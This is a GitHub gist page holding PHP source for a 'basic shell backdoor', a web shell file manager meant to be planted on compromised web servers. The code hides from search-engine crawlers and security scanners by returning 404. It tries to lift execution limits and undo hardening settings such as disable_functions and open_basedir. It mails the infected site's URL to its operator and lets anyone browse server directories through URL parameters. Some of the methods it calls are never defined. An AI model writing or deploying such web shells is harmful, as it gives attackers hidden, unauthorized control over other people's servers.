Last active
January 13, 2019 14:43
-
-
Save Cvar1984/bb52a45da593570d96245343bdaa8cd2 to your computer and use it in GitHub Desktop.
basic shell backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
* backdoor.php | |
* | |
* Copyright 2018 Cvar1984 <cvar1984@yourhead> | |
* | |
* This program is free software; you can redistribute it and/or modify | |
* it under the terms of the GNU General Public License as published by | |
* the Free Software Foundation; either version 2 of the License, or | |
* (at your option) any later version. | |
* | |
* This program is distributed in the hope that it will be useful, | |
* but WITHOUT ANY WARRANTY; without even the implied warranty of | |
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
* GNU General Public License for more details.9 | |
* | |
* You should have received a copy of the GNU General Public License | |
* along with this program; if not, write to the Free Software | |
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, | |
* MA 02110-1301, USA. | |
* | |
*/ | |
class Filemanager | |
{ | |
public function __construct() | |
{ | |
if (!empty($_SERVER['HTTP_USER_AGENT'])) { | |
$userAgents = array( | |
'Googlebot', | |
'DuckDuckBot', | |
'Baiduspider', | |
'Exabot', | |
'SimplePie', | |
'Curl', | |
'OkHttp', | |
'SiteLockSpider', | |
'BLEXBot', | |
'ScoutJet', | |
'AdsBot Google Mobile', | |
'Googlebot Mobile', | |
'MJ12bot', | |
'Slurp', | |
'MSNBot', | |
'PycURL', | |
'facebookexternalhit', | |
'facebot', | |
'ia_archiver', | |
'crawler', | |
'YandexBot', | |
'Rambler', | |
'Yahoo! Slurp', | |
'YahooSeeker', | |
'bingbot' | |
); | |
if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { | |
header('HTTP/1.0 404 Not Found'); | |
exit(); | |
} | |
} | |
unset($userAgents); | |
session_start(); | |
set_time_limit(0); | |
ignore_user_abort(0); | |
ini_set('max_execution_time', 0); | |
ini_set('memory_limit', '999999999M'); | |
ini_set('zlib.output_compression', 'Off'); | |
ini_restore('safe_mode'); | |
ini_restore("safe_mode_include_dir"); | |
ini_restore("safe_mode_exec_dir"); | |
ini_restore("disable_functions"); | |
ini_restore("allow_url_fopen"); | |
ini_restore("open_basedir"); | |
if (strtolower(substr(PHP_OS, 0, 3)) == 'win') { | |
define('SEP', '\\'); | |
define('OS', 'Windows'); | |
} else { | |
define('SEP', '/'); | |
define('OS', 'Linux'); | |
} | |
} | |
} | |
$Cvar1984=new Filemanager(); | |
if (!(isset($_SESSION['email']) && $_SESSION['email'] == true)) { | |
$email=array( | |
'email' => 'root@localhost', // Your Email For Activate Logger | |
'subject' => 'Logger', | |
'content' => 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'], | |
'header' => 'From:Cvar1984' | |
); | |
mail($email['email'], $email['subject'], $email['header']); | |
unset($email); | |
$_SESSION['email']=true; | |
} | |
// unset($_SESSION['email']); | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Backdoor</title> | |
<meta charset="utf-8" /> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge" /> | |
<meta name="viewport" content="width=device-width, initial-scale=1.0" /> | |
<link rel="shortcut icon" href="https://cvar1984.github.io/favicon.png" /> | |
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" /> | |
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js" type="text/javascript"></script> | |
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" type="text/javascript"></script> | |
<style> | |
::-moz-selection { | |
background: rgb(0, 0, 0); | |
color: rgb(900, 900, 900); | |
} | |
a, p { | |
color: rgb(50,50,50); | |
font-weight: lighter; | |
font-size: 9pt; | |
} | |
#button { | |
float: right; | |
margin-right: 7px; | |
} | |
</style> | |
</head> | |
<body class="modal-body"> | |
<nav class="navbar navbar-default" role="navigation"> | |
<div class="container-fluid"> | |
<!-- Brand and toggle get grouped for better mobile display --> | |
<div class="navbar-header"> | |
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse"> | |
<span class="sr-only">Toggle navigation</span> | |
<span class="icon-bar"></span> | |
<span class="icon-bar"></span> | |
<span class="icon-bar"></span> | |
</button> | |
<a class="navbar-brand" href="#">Backdoor jembut</a> | |
</div> | |
<!-- Collect the nav links, forms, and other content for toggling --> | |
<div class="collapse navbar-collapse navbar-ex1-collapse"> | |
<ul class="nav navbar-nav"> | |
<li class="active"><a href="#">Link</a></li> | |
<li><a href="#">Link</a></li> | |
</ul> | |
<ul class="nav navbar-nav navbar-right"> | |
<li><a href="#">Link</a></li> | |
<li class="dropdown"> | |
<a href="#" class="dropdown-toggle" data-toggle="dropdown">Dropdown <b class="caret"></b></a> | |
<ul class="dropdown-menu"> | |
<li><a href="#">Action</a></li> | |
<li><a href="#">Another action</a></li> | |
<li><a href="#">Something else here</a></li> | |
<li><a href="#">Separated link</a></li> | |
</ul> | |
</li> | |
</ul> | |
</div><!-- /.navbar-collapse --> | |
</div> | |
</nav> | |
<div class="modal-content"> | |
<div class="modal-header"> | |
<h1 class="modal-title" align="center">File manager</h1> | |
</div> | |
<?php | |
/* MAIN CONTROLERS */ | |
if (isset($_GET['dir'])) { | |
@chdir($_GET['dir']); | |
} | |
if (isset($_GET['do'])) { | |
if ($_GET['do'] == 'open' and isset($_GET['file'])) { | |
$Cvar1984->shell_manager_edit($_GET['file']); | |
} elseif ($_GET['do'] == 'logout') { | |
$Cvar1984->shell_logout(); | |
} | |
} | |
/* END CONTROLER */ | |
echo '<table class="table table-striped table-hover">'; | |
foreach (scandir(getcwd()) as $dir) { | |
$ext = pathinfo($dir, PATHINFO_EXTENSION); // file extension | |
if (is_dir($dir)) { | |
?> | |
<tr> | |
<td> | |
<a class="glyphicon glyphicon-folder-open" href="?dir=<?=getcwd().SEP.$dir; ?>"> <?=$dir; ?></a> | |
<a id="button" href="?do=touch&file=" class="btn btn-default btn-xs">Newfile</a> | |
<a id="button" href="?do=touch&dir=" class="btn btn-default btn-xs">Newdir</a> | |
<a id="button" href="?do=chmod&dir=" class="btn btn-default btn-xs">Chmod</a> | |
</td> | |
</tr> | |
<?php | |
} else { | |
?> | |
<tr> | |
<td> | |
<a class="glyphicon glyphicon-file" href="?do=open&file=<?=getcwd().SEP.$dir; ?>"> <?=$dir; ?></a> | |
<a id="button" href="?do=touch&file=" class="btn btn-default btn-xs">Newfile</a> | |
<a id="button" href="?do=touch&dir=" class="btn btn-default btn-xs">Newdir</a> | |
<a id="button" href="?do=chmod&file=" class="btn btn-default btn-xs">Chmod</a> | |
</td> | |
</tr> | |
<?php | |
} | |
} | |
?> | |
</table> | |
<div class="modal-footer"> | |
<p align="center">© <a href="https://github.com/Cvar1984">Cvar1984</a>, 2019</p> | |
</div> | |
</div> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment